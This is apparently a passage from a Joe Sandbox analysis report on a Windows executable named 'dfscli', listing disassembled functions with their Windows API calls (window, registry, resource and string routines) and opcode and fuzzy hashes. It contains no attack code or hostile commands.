                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window
                                                                  • String ID:
                                                                  • API String ID: 2353593579-0
                                                                  • Opcode ID: 81da272bab6fcc9ea7e7a7430d34d7fcffd1c11d78819ae3fe2fecd1ce21925b
                                                                  • Instruction ID: cb0a53dda468c9b6b58841506fecf0a12188666d2209ed4bb47fc30449578cc2
                                                                  • Opcode Fuzzy Hash: 81da272bab6fcc9ea7e7a7430d34d7fcffd1c11d78819ae3fe2fecd1ce21925b
                                                                  • Instruction Fuzzy Hash: FA01043320152ABBCF125F91AE05E9F3B26AF54361F854116FE0061160D77AD932EBAE
                                                                  Function 0042206C Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00422077
                                                                  • GetTopWindow.USER32(00000000), ref: 0042208A
                                                                    • Part of subcall function 0042206C: GetWindow.USER32(00000000,00000002), ref: 004220D1
                                                                  • GetTopWindow.USER32(?), ref: 004220BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item
                                                                  • String ID:
                                                                  • API String ID: 369458955-0
                                                                  • Opcode ID: 6c6900eeac992edc6914a5118e1541f0b22b5380ff1e1b3e7d3a0b70f71fff3c
                                                                  • Instruction ID: 611b05ef37a8cdda27b70757f5ae3b19c9143c7451e53f26c9eb106d08c62b60
                                                                  • Opcode Fuzzy Hash: 6c6900eeac992edc6914a5118e1541f0b22b5380ff1e1b3e7d3a0b70f71fff3c
                                                                  • Instruction Fuzzy Hash: 26018432301539B7DB322F52AE04FAF36559F157A0F804026FF00A1220D7B9D951D69D
                                                                  Function 004275D6 Relevance: 6.0, APIs: 4, Instructions: 48registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0042760A
                                                                  • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00427613
                                                                  • wsprintfA.USER32 ref: 0042762F
                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00427645
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                  • String ID:
                                                                  • API String ID: 1902064621-0
                                                                  • Opcode ID: dbcabcc69f35e4ea2064bd688e25f9756b693440038725029bf2d78983c0515e
                                                                  • Instruction ID: 249eee3b46158d6d5fcb97f90f683b9770f48eaba065b46f6e1ac24a512eab86
                                                                  • Opcode Fuzzy Hash: dbcabcc69f35e4ea2064bd688e25f9756b693440038725029bf2d78983c0515e
                                                                  • Instruction Fuzzy Hash: 5B015E32600629FBCB21AFA5DD05E9F3BA9BF08714F404436FA01A6150DB75DA129B98
                                                                  Function 0042A065 Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SysStringLen.OLEAUT32(?), ref: 0042A079
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0042B1A4,00000000), ref: 0042A08F
                                                                  • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0042A097
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,0042B1A4,00000000), ref: 0042A0AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Byte$CharMultiStringWide$Alloc
                                                                  • String ID:
                                                                  • API String ID: 3384502665-0
                                                                  • Opcode ID: 2f768fecabc726658f8f88acdcbfcc7f4af63c07174896c7a40ff147d03d0804
                                                                  • Instruction ID: dc896c3cb116076c9357b3b04fc63cbba15b70dbedf9f50e9427452b928ef166
                                                                  • Opcode Fuzzy Hash: 2f768fecabc726658f8f88acdcbfcc7f4af63c07174896c7a40ff147d03d0804
                                                                  • Instruction Fuzzy Hash: F1F05471207234BF93205B67DC48CEBBF9CEE8B2A4B014526F545C2110C6355801CBF6
                                                                  Function 00409508 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IntersectRect.USER32(?,00000000,?), ref: 00409539
                                                                  • EqualRect.USER32(?,00000000), ref: 00409546
                                                                  • IsRectEmpty.USER32(?), ref: 00409550
                                                                  • InvalidateRect.USER32(?,?,?), ref: 0040956D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                  • String ID:
                                                                  • API String ID: 3354205298-0
                                                                  • Opcode ID: f9175667af0f7be801df8ef0be15282322e2dc242db8e47f337ba70243cfd374
                                                                  • Instruction ID: 5a9675a2ec0c149863344b7b821c378a1e07663030a84a8ac4983ad52a3ab610
                                                                  • Opcode Fuzzy Hash: f9175667af0f7be801df8ef0be15282322e2dc242db8e47f337ba70243cfd374
                                                                  • Instruction Fuzzy Hash: 60014C3290011AEBDF11DFA5DC48EAAB7BCFF09314F408462F914A7111D230A6068B64
                                                                  Function 004239DB Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 004239FD
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28), ref: 00423A09
                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28,000000FF), ref: 00423A16
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,00420245,?,?,00403D00,?,?,?,?,?,0042CC28,000000FF), ref: 00423A31
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeLoadLock
                                                                  • String ID:
                                                                  • API String ID: 1078018258-0
                                                                  • Opcode ID: e10056d9a2660e3800f5a85b41266e3d05e9b35dc89b2b7957be5cf1a157bfe8
                                                                  • Instruction ID: f1e10e0b9d610b383d076a7a45ed5418143a48e9ec23dbbc25ebf98e0a5bfae2
                                                                  • Opcode Fuzzy Hash: e10056d9a2660e3800f5a85b41266e3d05e9b35dc89b2b7957be5cf1a157bfe8
                                                                  • Instruction Fuzzy Hash: E6F09036300225AB97219FA77C44D3BB6BCAF85762B85007EFE45D3211DE698D028679
                                                                  Function 0041FC6D Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnableMenuItem.USER32(?,?,?), ref: 0041FC98
                                                                  • GetFocus.USER32 ref: 0041FCAB
                                                                  • GetParent.USER32(?), ref: 0041FCB9
                                                                  • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 0041FCCE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: EnableFocusItemMenuMessageParentSend
                                                                  • String ID:
                                                                  • API String ID: 2297321873-0
                                                                  • Opcode ID: 5848d75683eeff144eec62b50be30f757bc95a58dccda503d274df78e6b91d20
                                                                  • Instruction ID: 667ea2b61b03b80e95b8bbf3fcb0286f57c03423c76812f661bbdfa9ca70b136
                                                                  • Opcode Fuzzy Hash: 5848d75683eeff144eec62b50be30f757bc95a58dccda503d274df78e6b91d20
                                                                  • Instruction Fuzzy Hash: 5501B130200605AFD7349F21DC09B5ABBB0FF50321F504A2EF502925F0D778B886EB88
                                                                  Function 00424346 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3022380644-0
                                                                  • Opcode ID: 9588c763b94ff57c08a9a562fa99b45d125bae693aa3a85c8c8a5c58bf168152
                                                                  • Instruction ID: 038d39e764909cb72f487515755dd880c683e44097d606ce0493c2f887320532
                                                                  • Opcode Fuzzy Hash: 9588c763b94ff57c08a9a562fa99b45d125bae693aa3a85c8c8a5c58bf168152
                                                                  • Instruction Fuzzy Hash: 4B018C31600524EFCB14DFA4C808BAEBBB1FF48315F40CA6AF9129B261CB399950DF94
                                                                  Function 0041A2EE Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ___addl
                                                                  • String ID:
                                                                  • API String ID: 2260456530-0
                                                                  • Opcode ID: 9462fbb24550e51235c69811f5d997a06ce5764b14ffee6f8e6d9ade5b511c72
                                                                  • Instruction ID: bebc27e0ad429c0126922934f5b1fa86729f384fc2e22584e0928f5d8e1cdaa7
                                                                  • Opcode Fuzzy Hash: 9462fbb24550e51235c69811f5d997a06ce5764b14ffee6f8e6d9ade5b511c72
                                                                  • Instruction Fuzzy Hash: 92F0CD3A401202AFCA105A02DC01EA3B7E9FF04354B0404ABFD5982235E732E8BCCB52
                                                                  Function 004265BD Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 004265D2
                                                                  • GetWindowTextA.USER32(?,?,00000100), ref: 004265EE
                                                                  • lstrcmpA.KERNEL32(?,?), ref: 00426602
                                                                  • SetWindowTextA.USER32(?,?), ref: 00426612
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow$lstrcmplstrlen
                                                                  • String ID:
                                                                  • API String ID: 330964273-0
                                                                  • Opcode ID: 205df15bef250dda04495d21c1cf24ecad239e14aeebe1b9e08572ee8303819d
                                                                  • Instruction ID: 32920149c2e13a73d1dc760514e2eeab2557267489b4b68b72185029daae6c0c
                                                                  • Opcode Fuzzy Hash: 205df15bef250dda04495d21c1cf24ecad239e14aeebe1b9e08572ee8303819d
                                                                  • Instruction Fuzzy Hash: 9FF0F975600118EBDF21AF65EC489CE7B69FB08350F4081A2F945E2260D7798A95DBA8
                                                                  Function 0042068B Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0042069E
                                                                  • GetActiveWindow.USER32 ref: 004206A9
                                                                  • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206B7
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Active$EnableFreeResource
                                                                  • String ID:
                                                                  • API String ID: 3751187028-0
                                                                  • Opcode ID: 252fd1aecebcf36ae1063793674cdf2c0fb2d0a1c58f11556f040e13d421e044
                                                                  • Instruction ID: 651b9e4e32d33f6c41131df07468a60757a46e08b7472d39c7ef1db3212f965c
                                                                  • Opcode Fuzzy Hash: 252fd1aecebcf36ae1063793674cdf2c0fb2d0a1c58f11556f040e13d421e044
                                                                  • Instruction Fuzzy Hash: 7DF08731B00325CFCF20EF90E8846AEB7F1FF48312F80053AE102B26A1C7396912CA19
                                                                  Function 0042A3E2 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 0042A404
                                                                  • GetTickCount.KERNEL32 ref: 0042A411
                                                                  • CoFreeUnusedLibraries.OLE32 ref: 0042A420
                                                                  • GetTickCount.KERNEL32 ref: 0042A426
                                                                    • Part of subcall function 0042A38B: CoFreeUnusedLibraries.OLE32(00000000,0042A46B,00000000,?,?,00409F1F), ref: 0042A3CF
                                                                    • Part of subcall function 0042A38B: OleUninitialize.OLE32(?,?,00409F1F), ref: 0042A3D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                  • String ID:
                                                                  • API String ID: 685759847-0
                                                                  • Opcode ID: a7b6454c06bf55826f1ca2544db4a5b5e913ae1ac901965ee86b94635a762fcd
                                                                  • Instruction ID: 53365efa4c1230ee432236039d3407cb682c0de065b522118cd881790a3b89b9
                                                                  • Opcode Fuzzy Hash: a7b6454c06bf55826f1ca2544db4a5b5e913ae1ac901965ee86b94635a762fcd
                                                                  • Instruction Fuzzy Hash: D0E06D31905261CBC710BBA4FC4C26A3BA0BB50308F409837E80193270C77868A5CF5B
                                                                  Function 0040FC9F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(?,?,00000000,00000000), ref: 0040FCD9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: @D$@D
                                                                  • API String ID: 1807457897-1398737213
                                                                  • Opcode ID: 91e4028214e053c96e7723c0768ed27d2ed356ddb9a79d95c398ad60e743bbb3
                                                                  • Instruction ID: 62482ca91026c37aa1dac497eb650ef51dc4ea81e72a355b0f7e427c1810b87f
                                                                  • Opcode Fuzzy Hash: 91e4028214e053c96e7723c0768ed27d2ed356ddb9a79d95c398ad60e743bbb3
                                                                  • Instruction Fuzzy Hash: 404139749041519FE720CFB4D48167A7BA1AF49304F28447FD68AEB7A2D23D581E8B8D
                                                                  Function 0040FAA4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: $
                                                                  • API String ID: 1807457897-3032137957
                                                                  • Opcode ID: a6edd212cb7947d5841bf6e2cae9edd82bd8bb28a2de40edc7fc4ba90436b0ee
                                                                  • Instruction ID: e3cc246aaaae655b62ba72c07eeb59b114e224ef0f58dc480b4ed99257abb5d6
                                                                  • Opcode Fuzzy Hash: a6edd212cb7947d5841bf6e2cae9edd82bd8bb28a2de40edc7fc4ba90436b0ee
                                                                  • Instruction Fuzzy Hash: 4441CD7150425C5EEB218764DC5ABFB3BE8EB06304F2408F2DA44E7192C27819ADDB9C
                                                                  Function 004166A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: __shift_strcat_strlen
                                                                  • String ID: e+000
                                                                  • API String ID: 208078240-1027065040
                                                                  • Opcode ID: 194d25e77a56b344b629a956c0d25f441e46d8e36f353af7accf61324439c85b
                                                                  • Instruction ID: 89f468d84c82e1ace85985d2492e42cf5a36f8a17d3e9c42b5c9dfd052896992
                                                                  • Opcode Fuzzy Hash: 194d25e77a56b344b629a956c0d25f441e46d8e36f353af7accf61324439c85b
                                                                  • Instruction Fuzzy Hash: 2221C0722093904FD72A9E38DC947E63BD45B03318F1944BFE485CA2D2D67DC885C759
                                                                  Function 00419FDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,020C13D8,00000000,00000007,00000007,^@,004176A0,00000000), ref: 0041A003
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0041A026
                                                                    • Part of subcall function 0040E502: __lock.LIBCMT ref: 0040E520
                                                                    • Part of subcall function 0040E502: HeapFree.KERNEL32(00000000,?,00431A60,0000000C,004108CC,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010), ref: 0040E567
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$FreeHeap__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 38926842-3067454934
                                                                  • Opcode ID: 2318afb57be2129960d38f3a2b4ee928f934c80d6b1bab9723fc74fbe9b91bfe
                                                                  • Instruction ID: 184d1faa913d037cc4e56e763f0fd7e80dd229126f78ea24d8bc9510c4970353
                                                                  • Opcode Fuzzy Hash: 2318afb57be2129960d38f3a2b4ee928f934c80d6b1bab9723fc74fbe9b91bfe
                                                                  • Instruction Fuzzy Hash: 5611A371907124BA9B209FAA9C45CDFBF6CDE0A7B4B304567F014E21D0EB349E50D6A9
                                                                  Function 0042149E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassInfoA.USER32(?,-0000007C,?), ref: 004214FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
